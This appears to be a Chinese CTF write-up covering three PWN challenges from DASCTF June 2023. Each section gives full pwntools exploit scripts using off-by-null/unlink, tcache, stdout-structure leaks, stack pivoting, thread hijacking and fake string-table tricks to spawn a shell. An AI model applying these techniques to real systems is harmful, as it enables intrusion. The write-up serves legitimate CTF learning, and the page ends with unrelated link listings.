DASCTF 2023六月挑战赛|二进制专项 PWN (下)

1.can_you_find_me

检查保护

意料之中

64位ida逆向

只有add,和del功能不能show

先看add吧

最多申请10个堆块

存在off_by_null漏洞,可以考虑unlink来进行堆块重叠

del函数就没有UAF漏洞了

1.首先想办法泄露出libc地址,因为本题libc是2.27的,所以引入了tcachebin机制,要么申请大堆块要么申请超过7个的小堆块,但是本题有限制申请的数量,结合off——by——null,优先考虑unlink

2.通过unlink,和tcachebin打配合,申请堆块到__IO_2_1_stdout_结构体上修改__IO_write_base_ 字段,由于后面调用了puts,所以会打印很多数据,本地测试是改末尾位\x58到_IO_file_jumps上,根据这个计算偏移

3.接着就是同样的手法打配合,free_hook改为system,进而得到shell。

ps:由于远程高位字节需要爆破,写个循环方便一点(1/16的概率)

exp:

from pwn import *

context(log_level='debug',arch='amd64',os='linux')

#io = process('./find')

libc = ELF('/home/su/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')

#io = remote('node5.buuoj.cn',27771)

def add(size,msg):

    io.sendlineafter('choice:','1');

    io.sendlineafter('Size:',str(size))

    io.sendlineafter('Data:',msg)

def free(index):

    io.sendlineafter('choice:','2');

    io.sendlineafter('Index:',str(index))

def pwn():

  add(0x410,'aa') #0

  add(0x20,'aa')  #1

  add(0x20,'aa')  #2

  add(0x30,'aa')  #3

  add(0x4f0,'aa') #4

  add(0x20,'/bin/sh\x00') #5

  gdb.attach(io)

  free(0)

  free(3)

  payload = b'a'*0x30 + p64(0x40+0x30+0x30+0x420)

  add(0x38,payload) #0

  #gdb.attach(io)

  free(4)

  free(1)

  add(0x410,'a') #1

  #gdb.attach(io)

  add(0x10,b'\x60\xc7') #3

  add(0x20,b'a') #4

  payload = p64(0xfbad1887) + p64(0)*3 + b'\x58'

  add(0x27,payload)

  libc_base = u64(io.recv(6).ljust(8,b'\x00')) - libc.sym['_IO_file_jumps']

  success('libc_base----->'+hex(libc_base))

  free_hook = libc_base + libc.sym['__free_hook']

  system = libc_base + libc.sym['system']

  pause()

  #gdb.attach(io)

  free(0)

  payload = b'a'*0x30 + p64(0) + p64(0x41) + p64(free_hook)

  add(0x60,payload)

  add(0x38,'aaa')

  add(0x38,p64(system))

  free(5)

  io.interactive()

while True:

    try:

        #io = remote('node5.buuoj.cn',27373)

        io = process('./find')

        pwn()

        break;

    except:

        io.close()

2.A dream

程序保护情况

没有开canary和pie保护

64位ida逆向

创建了一个子线程

进去看看

一直打印一句话(wyxy....)

主进程还有一个函数进去看看

一个读取存在8字节的溢出,可以栈迁移

(真那么简单吗?出题人你干了什么,你不开沙箱我们如何对抗ctfers,出题人冷冷一笑,哼,很简单,我保护开满不久好了,说罢出题人便开启了最终保护,让ctfers无处下手)

所以我们先看看沙箱

那么没有open也不能orw了,ida看到这个沙箱是在主线程里面,因此我们可以考虑劫持子线程拿到shell

1.怎么劫持呢?注意到子进程调用了write,那么可以劫持write_got表修改为下面这个地址

2.欸,这不就在子进程开始读取了嘛,直接开炫

3.注意要把主线程sleep起来不然主线程没了更不要说子线程了

exp:

from pwn import *

context(log_level='debug',arch='amd64',os='linux')

io = process('./dream')

#io = remote('node5.buuoj.cn',29280)

elf = ELF('./dream')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

#libc = ELF('libc6_2.31-0ubuntu9.7_amd64.so')

bss = elf.bss() + 0x100

magic_read = 0x4013AE

payload = b'a'*0x40 + p64(bss+0x40) + p64(magic_read)

io.send(payload)

#gdb.attach(io)

sleep(0.1)

pop_rdi_ret = 0x401483

pop_rsi_r15_ret = 0x401481

leave_ret = 0x40136c

payload = p64(pop_rsi_r15_ret) + p64(elf.got['write']) + p64(0) +p64(elf.plt['read'])

payload += p64(pop_rdi_ret) + p64(0x1000) + p64(elf.plt['sleep'])

payload = payload.ljust(0x40, b'\x00') + p64(bss-8) + p64(leave_ret)

io.send(payload)

sleep(0.1)

#gdb.attach(io)

io.send(p64(magic_read))

pause()

payload =b'a'*0x30 +p64(pop_rdi_ret) + p64(elf.got['puts']) +p64(elf.plt['puts']) + p64(magic_read)

gdb.attach(io)

io.send(payload)

sleep(0.1)

io.recvuntil('\n')

io.recvuntil('\n')

#io.recvuntil('\n')

#io.recvuntil('\n')

#io.recvuntil('\n')

#io.recvuntil('\n')

#io.recvuntil('\n')

#io.recvuntil('\n')

#sleep(0.2)

libc_base = u64(io.recv(6).ljust(8, b'\x00')) - libc.sym['puts']

success("libc_base:\t" + hex(libc_base))

bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

system_addr = libc_base + libc.sym['system']

ret = 0x40101a

#gdb.attach(io)

pop_rdi_rbp_ret = libc_base + 0x000000000002a745   #+ 0x248f2

thread_stack_rsp_addr = libc_base - 0x4150 + 0x2fa0 - 0x40 -8

success('thread_stack_rop_addr----->'+hex(thread_stack_rop_addr))

payload = p64(ret) + p64(pop_rdi_rbp_ret) + p64(bin_sh_addr) + p64(0) +p64(system_addr)

payload = payload.ljust(0x40, b'\x00') + p64(thread_stack_rsp_addr) +p64(leave_ret)

#gdb.attach(io)

io.send(payload)

io.interactive()

3.matchmaking platform

程序保护情况

只给我们留了一个延迟绑定

64位ida逆向

分别有两次机会向0x4140和0x40c0上面写东西

v3是char类型范围-127-128,起始是0,用了do,while,可以加到129,实现溢出变成-128,也就是可以写到0x40c0的位置(这个位置保存了程序里面的一个地址)

思路:1.通过溢出修改最后一位到老朋友_IO_2_1_stdout_结构体上,进而实现数据的泄露,有概率泄露出程序地址

2.因为程序是延迟绑定,通过伪造str_tab,劫持到free延迟绑定劫持到puts_got表上,最后放入参数/bin/sh拿到shell

exp:

from pwn import *

context(os = 'linux', arch = 'amd64', log_level = 'debug')

def pwn():

    io.sendafter("Age >> ", b'\x00' * 0x80 + b'\x80')

    io.sendlineafter("Photo(URL) >> ", p64(0xfbad1887) + p64(0) * 3 + b'\xb0\x5d')

    pie_base = u64(io.recv(6, timeout=0.5).ljust(8, b'\x00')) - 0x40a0

    if (pie_base & 0xfff) != 0:

        exit(-1)

    success("pie_base:\t" + hex(pie_base))

    pause()

    gdb.attach(io)

    payload = b'/bin/sh\x00' + p64(pie_base + 0x4140 - 0x67) + b'system\x00'

    io.sendafter("Name >> ", payload.ljust(0x80, b'\x00') + b'\x08')

    payload = p64(pie_base + 0x8).ljust(0x68, b'\x00') + p64(pie_base + 0x4140) #通过偏移劫持到puts

    io.sendlineafter("Hobby >> ", payload)

    io.interactive()

if __name__ == '__main__':

    while True:

        global io

        try:

            io = process("./matchmaking_platform")

            pwn()

            break

        except:

            io.close()

DASCTF 2023六月挑战赛|二进制专项 PWN (下)的更多相关文章

  1. [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇

    目录 [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇 格式化输出函数 printf函数族功能介绍 printf参数 type(类型) flags(标志) number(宽度) precisi ...

  2. [复现]2021 DASCTF X BUUOJ 五月大联动-PWN

    [复现]2021 DASCTF X BUUOJ 五月大联动 由于我没ubuntu16就不复现第一个题了,直接第二个 正常的off by one from pwn import * context.os ...

  3. Snort里如何将读取的包记录存到二进制tcpdump文件下(图文详解)

    不多说,直接上干货! 如果网络速度很快,或者想使日志更加紧凑以便以后的分析,那么应该使用二进制的日志文件格式.如tcpdump格式或者pcap格式.  这里,我们不需指定本地网络了,因为所以的东西都被 ...

  4. DASCTF NOV X联合出题人-PWN

    太忙了,下午4点才开始做,,剩下的以后补上 签个到 逻辑很简单两个功能的堆,一个就是申请heap.还有一个是检验如果校验通过就会得到flag 申请模块 ​ 中间0x886是个很恶心的东西,需要我们绕过 ...

  5. MySQL主从环境下存储过程,函数,触发器,事件的复制情况

    下面,主要是验证在MySQL主从复制环境下,存储过程,函数,触发器,事件的复制情况,这些确实会让人混淆. 首先,创建一张测试表 mysql),age int); Query OK, rows affe ...

  6. Fedora中显示windows下的文件

    目录 一些预备知识: 在中国windows的编码是本地编码 , 即GBK,GB2312,GB18030等 GBK  也就是windows-986 Windows现在只支持Unicode (UTF-16 ...

  7. js实现黑客帝国二进制雨

    置顶文章:<纯CSS打造银色MacBook Air(完整版)> 上一篇:<对于RegExp反向引用的一点理解> 作者主页:myvin 博主QQ:851399101(点击QQ和博 ...

  8. Android下的Linux指令集

    Android目录结构 data app:用户安装的应用 data:应用的专属文件夹 system:系统的配置信息,注册表文件 anr:anr异常的记录信息 dev:devices的缩写 存放设备所对 ...

  9. MySQL二进制日志(binary log)总结

    本文出处:http://www.cnblogs.com/wy123/p/7182356.html (保留出处并非什么原创作品权利,本人拙作还远远达不到,仅仅是为了链接到原文,因为后续对可能存在的一些错 ...

  10. mysql二进制日志的开启和使用

    二进制日志(BINLOG)记录了所有的ddl和dml语句,但不包括数据查询语句.语句以“事件”的形式保存,描述数据更改过程. 环境:win8   mysql5.6.23 1.mysql开启二进制日志 ...

随机推荐

  1. NOIP模拟75

    前言 先吐槽一下出题人,T2 牛马数据连棵树都不是.. T3 描述不清楚.. T1 如何优雅的送分 解题思路 我考场上还真以为是个送分题,然而... 莫比乌斯反演... 对于一个数字 n 有 \(2^ ...

  2. The sultion of P4959

    problem & blog 首先我们看到 \(x,y\) 有可能为负数,所以我们先把它旋转到第一象限. 然后我们发现如果 \(x_a \ge x_b\) 且 \(y_a \ge y_b\) ...

  3. Ubuntu安装VMware tools后不起作用

    复制和立即适应客户机不起作用. 解决: 1)不需要卸载 2)命令行执行sudo apt-get install open-vm-tools-desktop 3)可能会提示apt-get update或 ...

  4. rsync备份

    备份工具rsync 备份是太常见.且太重要的一个日常工作了. 备份源码.文档.数据库.等等. 类似cp命令拷贝,但是支持服务器之间的网络拷贝,且保证安全性. 学习背景 超哥游戏公司要每天都要对代码备份 ...

  5. Spring扩展——Aware接口

    Aware接口 在Spring中有许多的Aware接口,提供给应用开发者使用,通过Aware接口,我们可以通过set的方式拿到我们需要的bean对象(包括容器中提供的一些对象,ApplicationC ...

  6. 短链服务接口慢优化 redis应用

    短链服务接口慢优化 redis应用 短链接服务:1.长链接 查询 短链接(长链接如果存在,直接返回短链接,如果长链接不存在,则需要生成短链接),比如:在获取短信之前,或者管理后台编辑短信内容之前,需要 ...

  7. Thread交互及interrupt示例

    package com.test.docxml; /** Thread交互及interrupt示例 * 线程模拟:一个在睡觉,一个在敲墙,敲墙完成之后,把睡觉的吵醒了. */ public class ...

  8. Nivdia向量数据库图检索最新标杆——CAGRA

    本文连接:https://wanger-sjtu.github.io/CARGA/ CAGRA 是 N社在RAFT项目中 最新的 ANN 向量索引.这是一种高性能的. GPU 加速的.基于图的方法,尤 ...

  9. GIS数据获取:气象数据免费下载网站

      本文对目前主要的气象数据获取网站加以整理与介绍.   本文为"GIS数据获取整理"专栏中第二篇独立博客,因此本文全部标题均由"2"开头.本文对目前主要的气象 ...

  10. 2019 南昌区域赛 CEGLM 题解 & lagrange 插值

    B. A Funny Bipartite Graph 状压 dp ,利用了原题中选完左边点集,那么右边在 左边编号最大的那个数 之前的所有点都要选的性质,可以优化到 \(O(n \cdot 2^n)\ ...